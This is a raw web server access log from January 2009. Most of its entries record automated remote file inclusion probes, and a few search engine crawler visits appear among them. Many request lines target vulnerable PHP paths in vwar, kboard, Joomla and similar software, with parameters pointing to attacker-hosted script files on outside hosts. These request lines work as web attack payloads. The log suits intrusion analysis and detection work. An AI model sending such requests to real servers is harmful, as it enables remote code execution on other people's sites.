213.133.224.6 - - [14/Jan/2009:18:16:14 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
213.133.224.6 - - [14/Jan/2009:18:16:15 -0600] "GET ///vwar/backup/errors.php?error=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
213.133.224.6 - - [14/Jan/2009:18:17:25 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
213.133.224.6 - - [14/Jan/2009:18:17:25 -0600] "GET ///vwar/backup/errors.php?error=http://www.asthmant.org.au/.dat/sprinter.xpp??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
67.76.163.60 - - [14/Jan/2009:18:51:16 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.76.163.60 - - [14/Jan/2009:18:51:16 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.76.163.60 - - [14/Jan/2009:18:51:18 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.76.163.60 - - [14/Jan/2009:19:01:26 -0600] "GET /logs/access_log.1228953600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.230.166 - - [14/Jan/2009:19:32:00 -0600] "GET /logs/access_log.1185667200 HTTP/1.1" 200 1297 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
74.54.186.194 - - [14/Jan/2009:19:33:33 -0600] "GET /logs/%7B/convert/mvcw.php?step=1&vwar_root=%7Dhttp://bugdork.net23.net/tuti?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
74.54.186.194 - - [14/Jan/2009:19:33:33 -0600] "GET /%7B/convert/mvcw.php?step=1&vwar_root=%7Dhttp://bugdork.net23.net/tuti?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
65.23.154.45 - - [14/Jan/2009:19:35:08 -0600] "GET /logs/%7B/convert/mvcw.php?step=1&vwar_root=%7Dhttp://bugdork.net23.net/tuti?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
65.23.154.45 - - [14/Jan/2009:19:35:09 -0600] "GET /%7B/convert/mvcw.php?step=1&vwar_root=%7Dhttp://bugdork.net23.net/tuti?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
65.55.208.131 - - [14/Jan/2009:19:50:51 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [14/Jan/2009:19:50:51 -0600] "GET /logs/access_log.1178496000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.34.140.136 - - [14/Jan/2009:19:57:36 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
212.34.140.136 - - [14/Jan/2009:19:57:36 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:19:57:58 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:19:57:58 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:20:21:23 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:20:21:23 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
193.146.193.6 - - [14/Jan/2009:20:45:11 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
193.146.193.6 - - [14/Jan/2009:20:45:11 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
88.198.16.81 - - [14/Jan/2009:20:51:26 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.198.16.81 - - [14/Jan/2009:20:51:26 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.198.16.81 - - [14/Jan/2009:20:51:27 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.198.16.81 - - [14/Jan/2009:20:51:27 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.230.21.133 - - [14/Jan/2009:20:51:47 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.230.21.133 - - [14/Jan/2009:20:51:48 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.230.21.133 - - [14/Jan/2009:20:51:52 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.230.21.133 - - [14/Jan/2009:20:51:52 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
82.218.6.10 - - [14/Jan/2009:20:58:32 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.218.6.10 - - [14/Jan/2009:20:58:33 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
82.218.6.10 - - [14/Jan/2009:20:58:39 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.218.6.10 - - [14/Jan/2009:20:58:40 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
66.249.71.141 - - [14/Jan/2009:21:01:16 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.141 - - [14/Jan/2009:21:01:16 -0600] "GET /ahyphnybwgwcjaq.html HTTP/1.1" 404 303 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.121 - - [14/Jan/2009:21:07:17 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [14/Jan/2009:21:07:18 -0600] "GET /logs/access_log.1224633600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [14/Jan/2009:21:12:10 -0600] "GET /logs/access_log.1199318400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.164.17.65 - - [14/Jan/2009:21:13:17 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.164.17.65 - - [14/Jan/2009:21:13:17 -0600] "GET /logs/errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.164.17.65 - - [14/Jan/2009:21:13:18 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.164.17.65 - - [14/Jan/2009:21:13:18 -0600] "GET /errors.php?error=http://www.camelodromovirtual.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.208.131 - - [14/Jan/2009:21:14:20 -0600] "GET /logs/access_log.1198108800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.34.140.136 - - [14/Jan/2009:21:16:57 -0600] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
212.34.140.136 - - [14/Jan/2009:21:16:59 -0600] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.55.148.109 - - [14/Jan/2009:21:20:35 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
72.55.148.109 - - [14/Jan/2009:21:20:35 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
200.48.19.85 - - [14/Jan/2009:21:46:26 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.48.19.85 - - [14/Jan/2009:21:46:26 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.48.19.85 - - [14/Jan/2009:21:46:26 -0600] "GET /logs/access_log.1225065600//skin/zero_vote/ask_password.php?dir=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
98.216.3.48 - - [14/Jan/2009:21:54:36 -0600] "GET /logs/access_log.1169683200 HTTP/1.0" 200 71611 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.55.148.109 - - [14/Jan/2009:22:02:48 -0600] "GET /logs//errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.148.109 - - [14/Jan/2009:22:02:48 -0600] "GET //errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
193.146.193.6 - - [14/Jan/2009:22:03:52 -0600] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.146.193.6 - - [14/Jan/2009:22:03:52 -0600] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.162.219.29 - - [14/Jan/2009:22:05:01 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:22:05:01 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:22:05:31 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:22:05:31 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
63.247.65.114 - - [14/Jan/2009:22:11:15 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
63.247.65.114 - - [14/Jan/2009:22:11:15 -0600] "GET /logs/access_log.1227571200//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
63.247.65.114 - - [14/Jan/2009:22:11:18 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
63.247.65.114 - - [14/Jan/2009:22:11:21 -0600] "GET /logs/access_log.1227571200//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
63.247.65.114 - - [14/Jan/2009:22:11:21 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
63.247.65.114 - - [14/Jan/2009:22:11:21 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.234.141.238 - - [14/Jan/2009:22:19:39 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.822"
205.234.141.238 - - [14/Jan/2009:22:19:39 -0600] "GET //include/bbs.lib.inc.php?site_path=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.822"
207.162.219.29 - - [14/Jan/2009:22:47:06 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:22:47:06 -0600] "GET //skin/zero_vote/error.php?dir=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:22:54:19 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
207.162.219.29 - - [14/Jan/2009:22:54:19 -0600] "GET //skin/zero_vote/error.php?dir=http://zxczxc.fileave.com/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
206.130.11.80 - - [14/Jan/2009:23:43:13 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
206.130.11.80 - - [14/Jan/2009:23:43:13 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
206.130.11.80 - - [14/Jan/2009:23:43:13 -0600] "GET /logs/access_log.1229817600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
206.130.11.80 - - [14/Jan/2009:23:48:17 -0600] "GET /logs/access_log.1230076800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
209.172.41.135 - - [15/Jan/2009:00:02:55 -0600] "GET ////?_zb_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 3247 "-""libwww-perl/5.79"
209.172.41.135 - - [15/Jan/2009:00:02:55 -0600] "GET /logs////?_zb_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 174183 "-""libwww-perl/5.79"
209.172.41.135 - - [15/Jan/2009:00:40:33 -0600] "GET /logs///appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
209.172.41.135 - - [15/Jan/2009:00:40:33 -0600] "GET ///appserv/main.php?appserv_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
72.82.228.83 - - [15/Jan/2009:00:43:43 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.excitingclips.com/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:00:43:43 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.excitingclips.com/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:00:44:53 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.excitingclips.com/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:00:44:53 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.excitingclips.com/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:00:44:56 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:00:44:56 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.49.188.178 - - [15/Jan/2009:00:48:39 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.49.188.178 - - [15/Jan/2009:00:48:39 -0600] "GET /logs/access_log.1227744000//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.49.188.178 - - [15/Jan/2009:00:48:39 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.49.188.178 - - [15/Jan/2009:00:49:11 -0600] "GET /logs/access_log.1228348800//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
64.1.215.162 - - [15/Jan/2009:00:59:22 -0600] "GET /_vti_cnf/ HTTP/1.0" 200 664 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
70.86.113.106 - - [15/Jan/2009:01:06:59 -0600] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
70.86.113.106 - - [15/Jan/2009:01:06:59 -0600] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
69.64.49.145 - - [15/Jan/2009:01:07:52 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.allalabamawebsites.com//config/r.txt?? HTTP/1.1" 200 174186 "-""libwww-perl/5.805"
69.64.49.145 - - [15/Jan/2009:01:07:52 -0600] "GET ///////?mosConfig_absolute_path=http://www.allalabamawebsites.com//config/r.txt?? HTTP/1.1" 200 3250 "-""libwww-perl/5.805"
207.44.182.29 - - [15/Jan/2009:01:08:11 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.allalabamawebsites.com//config/r.txt?? HTTP/1.1" 200 174186 "-""libwww-perl/5.811"
69.64.49.145 - - [15/Jan/2009:01:08:18 -0600] "GET ///////?mosConfig_absolute_path=http://www.mckenzievalleypopwarner.com/poll/raid.txt?%0D?? HTTP/1.1" 200 3250 "-""libwww-perl/5.805"
69.64.49.145 - - [15/Jan/2009:01:08:18 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.mckenzievalleypopwarner.com/poll/raid.txt?%0D?? HTTP/1.1" 200 174186 "-""libwww-perl/5.805"
70.84.191.50 - - [15/Jan/2009:01:08:25 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/oye.txt? HTTP/1.1" 200 174186 "-""libwww-perl/5.811"
70.84.191.50 - - [15/Jan/2009:01:08:25 -0600] "GET ///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/oye.txt? HTTP/1.1" 200 3250 "-""libwww-perl/5.811"
207.44.182.29 - - [15/Jan/2009:01:08:28 -0600] "GET ///////?mosConfig_absolute_path=http://www.allalabamawebsites.com//config/r.txt?? HTTP/1.1" 200 3250 "-""libwww-perl/5.811"
94.103.82.87 - - [15/Jan/2009:01:09:01 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.allalabamawebsites.com//config/r.txt?? HTTP/1.1" 200 174186 "-""libwww-perl/5.805"
94.103.82.87 - - [15/Jan/2009:01:09:02 -0600] "GET ///////?mosConfig_absolute_path=http://www.allalabamawebsites.com//config/r.txt?? HTTP/1.1" 200 3250 "-""libwww-perl/5.805"
77.222.40.154 - - [15/Jan/2009:01:09:15 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
77.222.40.154 - - [15/Jan/2009:01:09:15 -0600] "GET //skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
77.222.40.154 - - [15/Jan/2009:01:09:15 -0600] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
77.66.40.79 - - [15/Jan/2009:01:10:26 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/oye.txt? HTTP/1.1" 200 174186 "-""libwww-perl/5.79"
77.66.40.79 - - [15/Jan/2009:01:10:26 -0600] "GET ///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/oye.txt? HTTP/1.1" 200 3250 "-""libwww-perl/5.79"
77.222.40.154 - - [15/Jan/2009:01:10:28 -0600] "GET /logs/access_log.1230422400//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
72.82.228.83 - - [15/Jan/2009:01:11:17 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.excitingclips.com/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:01:11:17 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.excitingclips.com/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:01:11:18 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
72.82.228.83 - - [15/Jan/2009:01:11:18 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.7.216.240 - - [15/Jan/2009:01:12:27 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
66.7.216.240 - - [15/Jan/2009:01:12:27 -0600] "GET //skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
66.7.216.240 - - [15/Jan/2009:01:12:27 -0600] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
200.49.188.178 - - [15/Jan/2009:01:12:43 -0600] "GET /logs/access_log.1230422400//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.49.188.178 - - [15/Jan/2009:01:12:43 -0600] "GET //skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.49.188.178 - - [15/Jan/2009:01:12:43 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
66.7.216.240 - - [15/Jan/2009:01:12:58 -0600] "GET /logs/access_log.1230422400//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
94.103.82.87 - - [15/Jan/2009:01:14:48 -0600] "GET ///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 200 3250 "-""libwww-perl/5.805"
94.103.82.87 - - [15/Jan/2009:01:14:51 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 200 174186 "-""libwww-perl/5.805"
193.47.80.46 - - [15/Jan/2009:01:15:54 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.46 - - [15/Jan/2009:01:15:54 -0600] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
77.66.40.79 - - [15/Jan/2009:01:22:58 -0600] "GET ///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 200 3250 "-""libwww-perl/5.79"
77.66.40.79 - - [15/Jan/2009:01:22:59 -0600] "GET /logs///////?mosConfig_absolute_path=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 200 174186 "-""libwww-perl/5.79"
200.13.253.154 - - [15/Jan/2009:01:41:17 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
200.13.253.154 - - [15/Jan/2009:01:41:17 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Jan/2009:01:52:04 -0600] "GET //skin/zero_vote/error.php?dir=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Jan/2009:01:52:04 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
